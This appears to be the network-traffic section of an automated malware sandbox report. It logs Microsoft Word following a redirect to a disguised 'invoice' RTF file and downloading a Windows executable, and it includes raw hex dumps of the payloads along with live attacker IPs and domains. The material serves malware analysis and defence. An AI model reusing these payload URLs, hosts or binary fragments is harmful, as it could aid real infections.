00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 66 3e 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 d0 74 02 00 68 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf_9PfPgLPf_;PfsVPf.V`PfRichPfPELZOaj-5@f>@th.texthj `.rdatan@@.data@.ndata``.rsrc@@
Jan 28, 2022 11:26:23.395648003 CET	101	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 08 4f 43 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 10 4f 43 00 8d 45 a4 Data Ascii: U\}t+}FEuHOCHPuuu@BSV5OCEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
Jan 28, 2022 11:26:23.395662069 CET	102	IN	Data Raw: 43 00 e9 f9 16 00 00 8b 88 e0 4f 43 00 89 88 80 4f 43 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 80 4f 43 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 80 4f 43 00 57 e9 31 16 00 00 8b 0d d0 3e 43 00 8b 35 50 Data Ascii: COCOCE4OC3;#MDE4OCW1>C5P@;tuQE>C;PQjuP@nmjPEH;tZj\VZHf>ff;u9]tEtulDuD;t=uu
Jan 28, 2022 11:26:23.395674944 CET	104	IN	Data Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb Data Ascii: fuSjUY;YUu;\|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
Jan 28, 2022 11:26:23.395690918 CET	105	IN	Data Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 eb 35 00 00 56 e8 66 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 e6 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 a7 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40 Data Ascii: uGSVj5Vf;;j9]t!VI9]\|PuD;tEV$@4jPpH;tvupDvQEffjuMEQPjHEf;fEVj@8@;EjHjEHuEVSuU
Jan 28, 2022 11:26:23.395704985 CET	106	IN	Data Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f0 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]M
Jan 28, 2022 11:26:23.395724058 CET	108	IN	Data Raw: 08 e8 c7 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59 Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=,OCUEi5(OC;\|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
Jan 28, 2022 11:26:23.395745993 CET	109	IN	Data Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 ab 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uLA$B;rPjdQ@PEh@PT@EPuD@EPhuh+3V39t$t B;tP8@5 B^95 B
Jan 28, 2022 11:26:23.395765066 CET	110	IN	Data Raw: 45 00 00 00 85 c0 74 2f 56 57 ff 75 0c e8 47 2c 00 00 85 c0 74 c8 01 75 fc 29 75 14 83 7d 14 00 7f cc eb 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff Data Ascii: Et/VWuG,tu)u}9u}uVWujXuE_^[t$t$5@+jjt$5@`@V(DV2Vu)u^V(V%Vh D1+^USVWj _3h]E@]@5@P]]
Jan 28, 2022 11:26:23.395782948 CET	112	IN	Data Raw: e8 78 2b 00 00 0f b7 05 5a a2 40 00 0f b7 0d 58 a2 40 00 c1 e0 10 0b c1 c7 45 f8 1a 00 00 00 a3 00 68 43 00 bf 28 aa 42 00 a1 10 4f 43 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 38 44 00 ff 15 e4 80 Data Ascii: x+Z@X@EhC(BOC W+Wp@9]t>jWh8D@t,SW(OC$WJ+W ;tP$@]fhCMuSV(3@9]th u'!j@9OCtvEPj(@P$@t/EPh0@S @SSES
Jan 28, 2022 11:26:23.538079023 CET	113	IN	Data Raw: 8b 29 66 33 e8 23 eb 66 85 ed 74 06 85 f6 75 ec eb 19 8b 51 02 89 15 e0 3e 43 00 8b 51 06 89 15 a8 4f 43 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 dc 3e 43 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00 Data Ascii: )f3#ftuQ>CQOCQufu3>CPW=%/,OC5(OCttPFP&Ou_^][V?CjV%V5HBD@^SUVt$$;WaU\|$$3GujUUUUW5HB@\$,uBH

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49174	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49176	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49177	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49173	107.172.93.32	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 11:26:19.345607996 CET	75	OUT	GET /invoice/dhl_shp.wbk HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 107.172.93.32 Connection: Keep-Alive
Jan 28, 2022 11:26:19.489567041 CET	76	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 10:26:19 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Last-Modified: Thu, 27 Jan 2022 13:19:32 GMT ETag: "498c-5d6902b3a248e" Accept-Ranges: bytes Content-Length: 18828 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 7b 5c 72 74 2e 24 35 3c 2d 2c 28 3f 3e 33 35 32 39 7e 29 3f 3d 40 31 3e 21 38 21 32 21 24 2d 2c 3e 32 3f 3f 5b 2a 5b 2c 21 7c 35 23 21 a7 35 5b 3d 3a 3f 26 b5 3f 32 28 3f 31 7c 25 3b 29 5b 36 23 2c 3f 5f 28 38 3b 2b 2d 60 2d 3d 2c 3c 3a 3f 3b b0 21 5e 3e 24 30 25 3f 3a 3b 29 24 3f 7e 60 3b 36 5f 40 25 31 5f 2c 60 2c 3f 26 5b a7 2f 34 3f 27 3d 36 21 60 5e 7e 2c 3f 30 32 31 35 23 5b 21 34 34 30 27 28 40 3a 25 2e 2b 3c 38 34 30 36 29 27 26 2a 39 3f 3f 24 3b 2c 36 36 40 28 23 2e 3f 2b 5e 3f 21 25 3f 40 5d 2a 5b 3a 60 39 7e 3b 2e 5e 34 60 32 36 29 23 3f 31 35 25 26 3c 2f 25 b5 31 3c 3f 40 28 25 3f 35 32 5b 28 2d 29 5f 5e 36 3f 3f 3f 27 5d 3f 21 3d 3f 34 3f 2a 7e 5d 32 27 32 34 3d 7c 34 40 3f 28 2f 3f a7 2a 36 37 b5 2c 2f 32 3f 3e 25 27 35 39 2d 3c 2a 3c 2e 35 2a 5b 3a 38 7c 36 2d 39 3e 40 2f 32 25 23 31 60 3f 32 40 3b 7c 23 a7 39 25 3a 3f 2a 2c 3e 26 5e 28 3d 23 38 a7 5d 30 21 27 5f 33 33 35 3c 21 2d 29 3f 40 25 36 3c 25 24 2f 40 34 3e 2d 5b 5d 2f 38 26 25 7c 27 3f 32 25 5b 32 26 25 26 2d 40 5d 7e 60 5b 5b 25 5d 21 5b 28 39 28 3c 5b 3d 30 5e 28 25 3d 5f 2d 3d 2d 3f 3a 3a 5d 3a 3b b0 25 2b 31 7c 5d 3f 2a 30 2b 60 5f 21 3f 2c b0 60 2d 21 38 2b 35 60 3f 35 5d 25 23 27 2b 29 3f 3d 5b 23 2c 25 2c 5b 5f 30 39 29 3c 31 26 2b 7c 3c 3c 32 40 38 36 40 3f 2f b0 29 b5 b0 7e 25 30 25 7c 40 2c 31 60 27 25 31 a7 7e 26 25 25 2a 7e 29 23 24 21 5d 2f 23 23 2f 36 2c 3c 38 24 60 24 2e 5b 3a 5b 31 2c 2f 33 25 3e 32 28 39 29 34 25 32 25 3f 28 34 7c 5b 3a 3f 7c 2e 38 31 25 30 27 25 5b 2d 40 a7 b0 38 3f 3f 31 38 60 3f 30 29 3c 37 32 2f 3f 3a 5e 3a 36 3b 34 33 2f 34 3f 2b 5b 3c 3f 2c 29 3f 33 24 36 2f 5f 36 b5 7c 25 2b 24 39 40 28 39 26 3f 40 3f 5f 21 28 2d 32 2c 31 24 37 3a 7c 25 5b 5e 5f 3c 3f 31 7e 2c 37 2c 3e 31 3f 27 5e 2d 3f 5e 38 34 3f 3e 5b 7c 3f 39 34 5b 3a 25 3b 3f 30 3f 3f 7c 7e 33 30 21 3d 3f 2c b0 3d 2d 25 7c 3b 32 31 3e 26 a7 24 3f 25 3f 2c 37 37 b5 b5 37 35 5e b0 3f 39 38 36 2e 30 25 29 2f 2e 40 60 2f 25 3e 28 3a 3f 33 31 7c 24 3f 32 34 b5 37 5b 3e 37 37 23 a7 21 a7 5f 24 2c 23 2a 5b 2f 25 3e 23 2c 28 39 3c 25 37 b0 3e 21 23 26 21 32 23 5f 60 3e 39 27 b5 60 29 25 5b 32 25 35 2d 2f 2d 36 2f 5b 40 7e 3f 24 2a 21 3e 36 b0 3a 5d 27 3f 26 21 b5 35 2e 32 2a 38 40 3f 2a 2d 34 24 2a 28 3f 27 3c 24 34 24 38 7c 7e 25 39 38 39 25 34 35 3c 3f 29 b0 24 2e b0 5d 3f 21 5d 7e 2c b5 3a 39 3f 29 3f 30 3f 2f 2c 5b 3d 38 26 3f 28 7e 60 60 5f 3f 21 3d 3f 2f 28 25 5d 3a 23 27 36 34 3f 2d 25 a7 25 3f 3c 28 5d 60 40 3c 2c 38 7c 2c 3a 3d 5d 33 3a 23 24 30 39 21 60 a7 21 38 7c 3f 3c 21 23 a7 29 b0 21 32 2c 7c 60 a7 5e 3c 5e 5d 2f 2f 7e 5f 39 35 30 39 3a 3f 7e 25 31 37 3e 5e 5b 37 21 3b 3f 3f 32 3e 3b 23 34 28 a7 3f 2e 25 3f 7e 2e 3b 3f 5d 5b 5e 25 33 2b 31 2e 5f 3c 3f 7e 2f 3d 3b 3b 60 40 5b 33 2b 32 b5 5e 30 2d 27 33 32 5f 28 2c 60 3b 29 30 60 35 2b 25 7e 21 2a 3d 39 37 60 36 36 27 5d 2b 2c 21 7e 2f 25 2f 3a 2c 2b 7c 31 7e 3f 36 25 b0 2a 3c 27 2f 60 3f 2e 3c 31 28 24 38 29 24 3f 5f 38 34 29 3e 3f 2b 5b 21 5b 3f 39 5e 27 60 3b 34 3b 7e 3a b0 2c 35 3f 3f 26 24 3d 25 2d a7 3f 28 33 31 34 b5 21 39 5d 5f 3e 26 3e b0 2f 3c 32 5b 25 60 5d 31 24 30 5f 3e 5e 25 33 7c 40 3d 25 34 3d 33 3f 3f 5f 34 5b 3a 7e 5d 38 21 35 3e 25 7e 32 40 2d 3d 29 Data Ascii: {\rt.$5<-,(?>3529~)?=@1>!8!2!$-,>2??[[,!\|5#!5[=:?&?2(?1\|%;)[6#,?_(8;+-`-=,<:?;!^>$0%?:;)$?~`;6_@%1_,`,?&[/4?'=6!`^~,?0215#[!440'(@:%.+<8406)'&9??$;,66@(#.?+^?!%?@][:`9~;.^4`26)#?15%&</%1<?@(%?52[(-)_^6???']?!=?4?~]2'24=\|4@?(/?67,/2?>%'59-<<.5[:8\|6-9>@/2%#1`?2@;\|#9%:?,>&^(=#8]0!'_335<!-)?@%6<%$/@4>-[]/8&%\|'?2%[2&%&-@]~`[[%]![(9(<[=0^(%=_-=-?::]:;%+1\|]?0+`_!?,`-!8+5`?5]%#'+)?=[#,%,[_09)<1&+\|<<2@86@?/)~%0%\|@,1`'%1~&%%~)#$!]/##/6,<8$`$.[:[1,/3%>2(9)4%2%?(4\|[:?\|.81%0'%[-@8??18`?0)<72/?:^:6;43/4?+[<?,)?3$6/_6\|%+$9@(9&?@?_!(-2,1$7:\|%[^_<?1~,7,>1?'^-?^84?>[\|?94[:%;?0??\|~30!=?,=-%\|;21>&$?%?,7775^?986.0%)/.@`/%>(:?31\|$?247[>77#!_$,#[/%>#,(9<%7>!#&!2#_`>9'`)%[2%5-/-6/[@~?$!>6:]'?&!5.28@?-4$(?'<$4$8\|~%989%45<?)$.]?!]~,:9?)?0?/,[=8&?(~``_?!=?/(%]:#'64?-%%?<(]`@<,8\|,:=]3:#$09!`!8\|?<!#)!2,\|`^<^]//~_9509:?~%17>^[7!;??2>;#4(?.%?~.;?][^%3+1._<?~/=;;`@[3+2^0-'32_(,`;)0`5+%~!=97`66']+,!~/%/:,+\|1~?6%*<'/`?.<1($8)$?_84)>?+[![?9^'`;4;~:,5??&$=%-?(314!9]_>&>/<2[%`]1$0_>^%3\|@=%4=3??_4[:~]8!5>%~2@-=)
Jan 28, 2022 11:26:19.489625931 CET	77	IN	Data Raw: 21 7e 33 35 34 26 36 23 35 3f 24 3a 3d 39 26 30 7c 32 3e 2e 3c 3f 3f 3d 27 3c 24 5b 28 7c 3f 30 31 33 28 25 36 5f 25 28 35 2c 7c 35 25 2e 30 32 24 24 35 5b 3a b0 3f 3a 29 5d 40 60 3f 2b b5 7e 3a 5e 36 3a b5 37 31 b5 3f 2c 5d 7c 36 21 2d 7c 2e 2b Data Ascii: !~354&6#5?$:=9&0\|2>.<??='<$[(\|?013(%6_%(5,\|5%.02$$5[:?:)]@`?+~:^6:71?,]\|6!-\|.+2\|1_%&21#??7%?-%>.68-'_/$^7%2>_;`8\|4<8;,?1?8?/870+:86[`.;:&31/5&8/['3@]7-9'2^%,$36)4?&~)2=\|+~9[6.5[7%9#?<7(!0,5?^9#5-$:-?{\object19626013
Jan 28, 2022 11:26:19.489659071 CET	79	IN	Data Raw: 30 0a 0a 0a 30 30 30 0a 0d 0a 30 0a 0a 0a 30 0d 0a 0a 30 09 30 20 30 09 30 09 30 30 30 09 30 30 30 20 30 30 30 09 30 0d 0a 0a 30 09 30 0a 0a 0a 30 0a 0d 0a 30 30 0d 0a 0a 30 30 0a 0a 0a 30 09 33 65 0a 0a 0a 30 30 0d 0a 0d 30 33 30 30 09 66 0d 0a Data Ascii: 00000000 00000000 0000000000003e000300feff090006 0000000000000000000000010 000 0 001000000 00 000000001000000200000001
Jan 28, 2022 11:26:19.489692926 CET	80	IN	Data Raw: 66 0d 0d 0a 66 66 66 66 66 66 66 0a 0d 0a 66 66 66 20 66 66 20 66 66 66 20 66 66 09 66 66 66 0d 0a 0a 66 0a 0a 0a 66 66 66 66 0a 0a 0a 66 0d 0d 0d 66 66 0a 0d 0d 66 09 66 0d 0a 0d 66 0d 0a 0d 66 20 66 66 20 66 0a 0a 0d 66 66 0a 0a 0d 66 0d 0a 0d Data Ascii: fffffffffff ff fff fffffffffffffffff ff fffffffff ff f ffff fffff fffffffffffffffffffffffffffffffffffffff fff ffff fffff fffffff fff
Jan 28, 2022 11:26:19.489721060 CET	81	IN	Data Raw: 0a 0d 66 66 0a 0a 0d 66 0d 0d 0d 66 09 66 66 66 66 0d 0a 0d 66 66 0a 0d 0a 66 66 66 66 20 66 66 66 66 20 66 09 66 0a 0d 0a 66 0d 0a 0d 66 66 0d 0d 0d 66 09 66 66 66 66 0d 0d 0d 66 20 66 0d 0a 0d 66 66 66 66 09 66 20 66 0d 0a 0a 66 66 66 66 66 20 Data Ascii: ffffffffffffff ffff fffffffffff ffffff ffffff fff ffffffffffffffffff fff ffff fffffff fffffffffff fffffff ffffffff fff ffffff ffff f ff f ffffff ff
Jan 28, 2022 11:26:19.489753008 CET	83	IN	Data Raw: 66 66 20 66 66 66 20 66 0a 0a 0a 66 0d 0a 0a 66 66 20 66 09 66 20 66 66 66 66 0d 0a 0a 66 66 09 66 0a 0d 0d 66 66 66 0a 0a 0d 66 09 66 66 66 0d 0a 0a 66 0d 0d 0d 66 09 66 66 66 66 66 66 0d 0d 0d 66 66 0d 0d 0d 66 66 20 66 20 66 20 66 09 66 66 09 Data Ascii: ff fff ffff ff ffffffffffffffffffffffffff f f fffff52006f 0 06f 00 7400 20 0045 006e0 0 740072 00 790 0000000000 0 0 00000 00 000 000 00000 0 00000000000000000
Jan 28, 2022 11:26:19.489789009 CET	84	IN	Data Raw: 09 30 0d 0a 0a 30 0a 0a 0a 30 30 30 09 30 0a 0a 0a 30 0a 0a 0a 30 30 0a 0d 0a 30 66 09 66 66 0a 0d 0a 66 66 66 09 66 66 66 66 0a 0d 0a 66 66 0d 0d 0a 66 20 66 66 20 66 0d 0a 0a 66 66 09 66 66 66 66 66 20 66 30 20 30 0d 0a 0a 30 30 30 30 09 30 20 Data Ascii: 0000000000fffffffffffff ff ffffffff f0 000000 0000 0 000000000000000000000000000 000000 0000 000 0 0000000 0000000000 000 0000000 0
Jan 28, 2022 11:26:19.489815950 CET	86	IN	Data Raw: 66 66 0a 0d 0d 66 66 66 66 20 66 66 20 66 66 66 66 66 66 66 66 0a 0a 0a 66 20 66 0d 0a 0a 66 66 66 66 0a 0a 0a 66 66 20 66 66 66 20 66 66 66 0a 0a 0a 66 0d 0a 0a 66 66 66 66 0d 0a 0a 66 66 0d 0a 0a 66 66 20 66 20 66 20 66 66 66 66 66 66 09 66 66 Data Ascii: ffffff ff fffffffff fffffff fff ffffffffffff f f ffffffff ffff ff f fffffffffffffffffffff ffff fff fff fffffff fffffffffff fffff fffff fff ff fff f ff
Jan 28, 2022 11:26:19.489872932 CET	87	IN	Data Raw: 66 66 09 66 0a 0d 0d 66 66 66 0a 0a 0d 66 0a 0a 0d 66 09 66 66 66 0d 0a 0d 66 66 66 66 66 66 66 66 0d 0a 0d 66 0a 0a 0d 66 66 09 66 09 66 66 66 66 66 0a 0a 0d 66 20 66 0d 0a 0d 66 0a 0d 0d 66 66 66 66 66 66 0a 0d 0d 66 0a 0a 0a 66 09 66 20 66 66 Data Ascii: fffffffffffffffffffffffffffff fffffffffff ffffffff ffff fff ffffffffffffffff265e8d0102 55 c190 b05901 08f65b bdfdfd778981e5 c4be4d 608b 5
Jan 28, 2022 11:26:19.489917994 CET	88	IN	Data Raw: 62 0d 0a 0a 61 0d 0a 0a 35 20 33 20 34 0d 0a 0a 63 35 09 38 0a 0a 0a 62 62 09 66 39 32 20 31 20 36 09 65 61 0a 0a 0a 31 34 63 32 0a 0a 0a 65 20 33 0d 0a 0d 32 64 20 62 20 37 09 34 0a 0d 0d 36 09 38 61 09 39 0a 0d 0d 63 09 65 30 37 63 32 64 37 38 Data Ascii: ba5 3 4c58bbf92 1 6ea14c2e 32d b 7468a9ce07c2d782ed2f32edf0e46a6178515791f 621134a4 e5f 197f59fafd946bdc9 e0 f133 818eb0171ff
Jan 28, 2022 11:26:19.632489920 CET	90	IN	Data Raw: 62 0d 0a 0d 64 35 0a 0a 0d 37 39 0a 0a 0d 32 32 35 31 0d 0a 0d 38 09 64 35 31 09 37 63 66 0d 0a 0d 37 09 62 62 20 32 32 0d 0a 0d 32 66 35 37 20 66 20 32 31 38 20 61 0a 0d 0d 31 0a 0a 0d 65 20 38 63 31 30 0d 0d 0a 32 20 30 20 33 09 38 0a 0d 0a 32 Data Ascii: bd57922518d517cf7bb 222f57 f 218 a1e 8c102 0 382377 e0d21 7 8f4561 cf1a74 7d87968c22 8e8adef088c12e6b a98 bf 73d 00f6a 7 70ab1edcb7 1c5 8 a fa 3
Jan 28, 2022 11:26:20.769046068 CET	97	OUT	HEAD /invoice/dhl_shp.wbk HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 107.172.93.32 Content-Length: 0 Connection: Keep-Alive
Jan 28, 2022 11:26:20.914331913 CET	98	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 10:26:20 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Last-Modified: Thu, 27 Jan 2022 13:19:32 GMT ETag: "498c-5d6902b3a248e" Accept-Ranges: bytes Content-Length: 18828 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Direction	Data
2022-01-28 10:26:03 UTC	OUT	OPTIONS /index.php/ HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: onebztip.club Content-Length: 0 Connection: Keep-Alive
2022-01-28 10:26:03 UTC	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: text/html; charset=UTF-8 content-length: 10885 date: Fri, 28 Jan 2022 10:26:03 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2022-01-28 10:26:03 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link type="text

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:08 UTC	11	OUT	HEAD /index.php/x HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: onebztip.club
2022-01-28 10:26:09 UTC	11	IN	HTTP/1.1 302 Found keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 location: http://107.172.93.32/invoice/dhl_shp.wbk content-type: text/html; charset=UTF-8 date: Fri, 28 Jan 2022 10:26:09 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 x-turbo-charged-by: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:13 UTC	11	OUT	OPTIONS /index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: onebztip.club
